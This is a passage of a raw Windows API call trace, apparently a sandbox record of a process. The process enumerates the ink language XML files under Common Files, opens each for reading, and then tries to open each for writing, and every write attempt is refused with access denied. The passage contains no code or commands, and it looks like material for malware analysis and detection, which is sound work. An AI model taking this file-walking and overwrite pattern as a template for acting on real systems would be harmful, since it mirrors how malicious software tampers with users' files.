lpWideCharStr=0x0) returned 62 [0100.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e030 [0100.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x6e030, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfin.xml") returned 62 [0100.019] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfin.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.019] GetFileType (hFile=0x368) returned 0x1 [0100.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0100.019] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.019] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.019] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.019] CloseHandle (hObject=0x368) returned 1 [0100.019] AreFileApisANSI () returned 1 [0100.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0100.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e030 [0100.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x6e030, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfin.xml") returned 62 [0100.020] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfin.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.020] GetLastError () returned 0x5 [0100.020] GetLastError () returned 0x5 [0100.020] SetLastError (dwErrCode=0x5) [0100.020] GetLastError () returned 0x5 [0100.020] SetLastError (dwErrCode=0x5) [0100.020] GetLastError () returned 0x5 [0100.020] SetLastError (dwErrCode=0x5) [0100.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0100.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0100.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0100.020] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.020] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.020] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c940eb6, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7c940eb6, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7c940eb6, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa44, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="ipsfra.xml", cAlternateFileName="")) returned 1 [0100.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0100.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0100.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0100.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0100.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0100.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0100.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0100.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0100.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0100.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0100.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0100.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0100.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0100.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0100.021] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.021] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.021] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.021] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0100.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.021] AreFileApisANSI () returned 1 [0100.021] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfra.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfra.xml", lpUsedDefaultChar=0x0) returned 62 [0100.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0100.021] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.021] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0100.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0100.021] AreFileApisANSI () returned 1 [0100.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0100.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6df20 [0100.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6df20, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfra.xml") returned 62 [0100.022] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfra.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.022] GetFileType (hFile=0x368) returned 0x1 [0100.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0100.022] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.022] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.022] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.022] CloseHandle (hObject=0x368) returned 1 [0100.023] AreFileApisANSI () returned 1 [0100.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0100.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6ea48 [0100.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6ea48, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfra.xml") returned 62 [0100.023] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfra.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.023] GetLastError () returned 0x5 [0100.023] GetLastError () returned 0x5 [0100.023] SetLastError (dwErrCode=0x5) [0100.023] GetLastError () returned 0x5 [0100.023] SetLastError (dwErrCode=0x5) [0100.023] GetLastError () returned 0x5 [0100.023] SetLastError (dwErrCode=0x5) [0100.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0100.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0100.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0100.023] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.023] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.023] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d126e12, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d126e12, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x9e4, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="ipshe.xml", cAlternateFileName="")) returned 1 [0100.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0100.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0100.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0100.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0100.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0100.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0100.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0100.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0100.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0100.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0100.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351d0 | out: hHeap=0x20000) returned 1 [0100.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0100.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0100.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0100.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0100.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0100.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0100.024] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.024] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.024] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.024] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0100.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0100.024] AreFileApisANSI () returned 1 [0100.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshe.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshe.xml", lpUsedDefaultChar=0x0) returned 61 [0100.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0100.024] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.024] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0100.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0100.024] AreFileApisANSI () returned 1 [0100.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0100.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7a) returned 0x6e470 [0100.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6e470, cchWideChar=61 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshe.xml") returned 61 [0100.025] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshe.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshe.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.025] GetFileType (hFile=0x368) returned 0x1 [0100.025] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0100.025] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.025] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.025] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.025] CloseHandle (hObject=0x368) returned 1 [0100.026] AreFileApisANSI () returned 1 [0100.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0100.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7a) returned 0x6e030 [0100.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6e030, cchWideChar=61 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshe.xml") returned 61 [0100.026] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshe.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshe.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.026] GetLastError () returned 0x5 [0100.026] GetLastError () returned 0x5 [0100.026] SetLastError (dwErrCode=0x5) [0100.026] GetLastError () returned 0x5 [0100.026] SetLastError (dwErrCode=0x5) [0100.026] GetLastError () returned 0x5 [0100.026] SetLastError (dwErrCode=0x5) [0100.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0100.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0100.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0100.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0100.026] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.026] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.026] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d126e12, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d126e12, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x9d6, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="ipshi.xml", cAlternateFileName="")) returned 1 [0100.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0100.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0100.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0100.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0100.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0100.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0100.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0100.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351d0 | out: hHeap=0x20000) returned 1 [0100.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0100.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0100.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0100.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0100.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0100.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0100.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5ef58 [0100.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0100.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0100.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ef58 | out: hHeap=0x20000) returned 1 [0100.027] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.027] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.027] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.027] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0100.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0100.027] AreFileApisANSI () returned 1 [0100.027] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshi.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshi.xml", lpUsedDefaultChar=0x0) returned 61 [0100.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0100.027] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.027] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0100.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0100.027] AreFileApisANSI () returned 1 [0100.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0100.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7a) returned 0x6e2d8 [0100.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x6e2d8, cchWideChar=61 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshi.xml") returned 61 [0100.028] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshi.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshi.xml"), dwDesiredAccess=0x80000000, 